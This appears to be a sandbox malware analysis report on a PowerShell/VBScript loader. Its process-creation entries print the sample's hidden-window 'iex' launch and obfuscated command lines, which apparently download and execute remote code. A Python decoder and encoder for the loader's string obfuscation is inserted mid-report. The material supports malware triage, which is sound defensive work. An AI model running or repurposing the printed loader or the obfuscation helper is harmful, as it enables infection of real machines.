          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical events)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (60 identical events)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 entries)
          Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6103
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3449
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4436
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5364
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5389
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4408
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 | Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640 | Thread sleep count: 4436 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 | Thread sleep count: 5364 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876 | Thread sleep time: -11990383647911201s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360 | Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 entries)
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000002.00000002.1606506810.000002CD5FD1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000009.00000002.2658934966.0000022F39763000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWI
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000005.00000002.1410489118.000001B64639B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (3 entries)

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: amsi64_8104.amsi.csv, type: OTHER
          Source: Yara match | File source: amsi64_8156.amsi.csv, type: OTHER
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8156, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
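The powershell.exe command lines listed above carry the sample's own string decoder. `gaardspladsens` keeps every sixth character of each single-quoted literal, starting at offset 5 with a 1-character width (the width, `$Bellisserne`, is only incremented to 1 after the `${host}.CurrentCulture` check, so a host without a culture would decode every literal to an empty string), and it assembles the method name from `'SUBsTRI'` + `'ng'` so that `Substring` never appears as a literal. `sanktionjtr` then dot-sources whatever `$Emanciperingerne` decodes to, with the decoded text as its argument. The Python below is an added example, not code from the report or from the sample: it reimplements the decoder, pulls the literals out of a command line, and round-trips a constructed payload. The three literals it decodes (`$Fangstknivens`, `$Deaktiverende`, `$Emanciperingerne`) are copied from the command line above; the filler text, the helper names and the `cmd /c whoami` payload are this example's own choices. The longer literals on the page (the `$Forlngelsers`, `$Unyttigst` and `$Cometlike` values) contain runs of spaces that the rendered report collapsed, so they do not decode cleanly from the text as displayed.

```python
import itertools
import re

# Added example, not code from the report or the sample: a re-implementation of the
# string decoder embedded in the powershell.exe command lines above.
#
# The sample's decoder, gaardspladsens($Agerendes), does the following:
#   $Bellisserne = 1    ($null until `If (${host}.CurrentCulture) {$Bellisserne++}` runs)
#   $Dafter135   = $Agerendes.Length - $Bellisserne
#   for ($i = 5; $i -lt $Dafter135; $i += 6) { $out += $Agerendes.SubString($i, $Bellisserne) }
# so every 6th character starting at offset 5 is payload and the other five are filler.

STRIDE = 6   # chunk length: 5 filler characters + 1 payload character
FIRST = 5    # offset of the payload character inside each chunk
WIDTH = 1    # $Bellisserne after the CurrentCulture check


def deobfuscate(s: str, stride: int = STRIDE, first: int = FIRST, width: int = WIDTH) -> str:
    """Reproduce gaardspladsens: concatenate s[i:i+width] for i = first, first+stride, ...
    while i < len(s) - width. That bound is the sample's own, and it is why every literal
    ends in a trailing chunk such as 'Defin ' that is never read back."""
    limit = len(s) - width
    return "".join(s[i:i + width] for i in range(first, limit, stride))


def obfuscate(plain: str, filler: str = "Anetholes Klosetternes Venushaar Paralalia",
              stride: int = STRIDE) -> str:
    """Inverse transform, used only to build round-trip test vectors. The default filler is
    taken from the junk text the sample prints with `write '...'`; the sample itself pads
    with fragments of dictionary words, and any filler works."""
    junk = itertools.cycle(filler)
    chunks = ["".join(itertools.islice(junk, stride - 1)) + ch for ch in plain]
    chunks.append("".join(itertools.islice(junk, stride - 1)) + " ")  # trailing, unread chunk
    return "".join(chunks)


def decode_calls(cmdline: str, func_name: str = "gaardspladsens") -> list:
    """Pull every `func_name '<literal>'` argument out of a command line and decode it.
    PowerShell single-quoted literals have no escapes other than a doubled quote, and none
    of the sample's literals contain a quote, so the next single quote ends the argument.
    IGNORECASE also covers the lower-cased copy of the command line the report lists."""
    pattern = re.compile(re.escape(func_name) + r"\s*\(?\s*'([^']*)'", re.IGNORECASE)
    return [deobfuscate(m.group(1)) for m in pattern.finditer(cmdline)]


# Constructed command-line fragment: three literals copied verbatim from the command line
# above (the short ones, whose whitespace survived the report's rendering).
SAMPLE_CMD = (
    "$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';"
    "$Deaktiverende=gaardspladsens 'panor> atol ';"
    "$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';"
)


if __name__ == "__main__":
    for decoded in decode_calls(SAMPLE_CMD):
        print(repr(decoded))
    # Round trip on a constructed payload to show the scheme end to end.
    payload = "cmd /c whoami"
    encoded = obfuscate(payload)
    print(encoded)
    assert deobfuscate(encoded) == payload
```

Run against the fragment, `decode_calls` returns `User-Agent`, `>` and `iex` in that order. The last of these is the value of `$Emanciperingerne`, so `sanktionjtr (gaardspladsens '...')` in the command line amounts to `. iex <decoded text>`: each decoded literal is executed in the caller's scope, which is how the download-and-execute behaviour flagged at the top of the report is driven without any readable command text on the command line. When triaging a variant, change `FIRST`, `STRIDE` or `func_name` to match whatever the variant's loop uses; the structure of the loop is the stable part.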
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (14 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 entries)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
